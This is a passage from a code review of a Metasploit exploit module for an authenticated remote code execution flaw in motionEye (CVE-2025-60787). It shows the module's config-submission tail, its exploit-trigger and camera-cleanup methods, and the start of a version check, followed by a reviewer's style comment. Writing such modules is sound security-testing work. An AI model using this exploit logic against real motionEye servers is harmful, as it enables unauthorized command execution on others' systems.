modules/exploits/multi/http/motioneye_auth_rce_cve_2025_60787.rb

```diff
@@ -0,0 +1,404 @@
+          'email_notifications_picture_time_span' => '0',
+          'telegram_notifications_enabled' => false,
+          'telegram_notifications_api' => '',
+          'telegram_notifications_chat_id' => '',
+          'telegram_notifications_picture_time_span' => '0',
+          'web_hook_notifications_enabled' => false,
+          'web_hook_notifications_url' => '',
+          'web_hook_notifications_http_method' => 'GET',
+          'web_hook_end_notifications_enabled' => false,
+          'web_hook_end_notifications_url' => '',
+          'web_hook_end_notifications_http_method' => 'GET',
+          'command_notifications_enabled' => false,
+          'command_notifications_exec' => '',
+          'command_end_notifications_enabled' => false,
+          'command_end_notifications_exec' => '',
+          'working_schedule' => false,
+          'monday_from' => '',
+          'monday_to' => '',
+          'tuesday_from' => '',
+          'tuesday_to' => '',
+          'wednesday_from' => '',
+          'wednesday_to' => '',
+          'thursday_from' => '',
+          'thursday_to' => '',
+          'friday_from' => '',
+          'friday_to' => '',
+          'saturday_from' => '',
+          'saturday_to' => '',
+          'sunday_from' => '',
+          'sunday_to' => '',
+          'working_schedule_type' => 'during',
+          'video_controls' => {},
+          'resolution' => '640x480'
+        }
+      }.to_json
+    )
+
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, "#{peer} Server did not respond with the expected HTTP 200")
+    end
+
+    print_good('Exploit installation completed')
+  end
+
+  def run_exploit(camera_id)
+    print_status('Executing exploit...')
+
+    res = send_signed_request_cgi(
+      'uri' => normalize_uri(target_uri.path, "/action/#{camera_id}/snapshot/"),
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'data' => 'null'
+    )
+
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, "#{peer} Server did not respond with the expected HTTP 200")
+    end
+
+    print_good('Execution exploit request sent successfully')
+  end
+
+  def del_camera(camera_id)
+    print_status('Removing camera')
+
+    res = send_signed_request_cgi(
+      'uri' => normalize_uri(target_uri.path, "/config/#{camera_id}/rem/"),
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'data' => 'null'
+    )
+
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, "#{peer} Server did not respond with the expected HTTP 200")
+    end
+
+    print_good('Camera removed successfully')
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET'
+    )
+
+    motion_version_span = res.get_html_document.at('tr.settings-item:has(td.settings-item-label span:contains("motionEye Version")) td.settings-item-value span.settings-item-label')
```

Comment:
We should likely be using Nokogiri here and then using XPath matchers vs doing something like this to confirm to how we do things in other exploits. This should also simplify this logic in the process.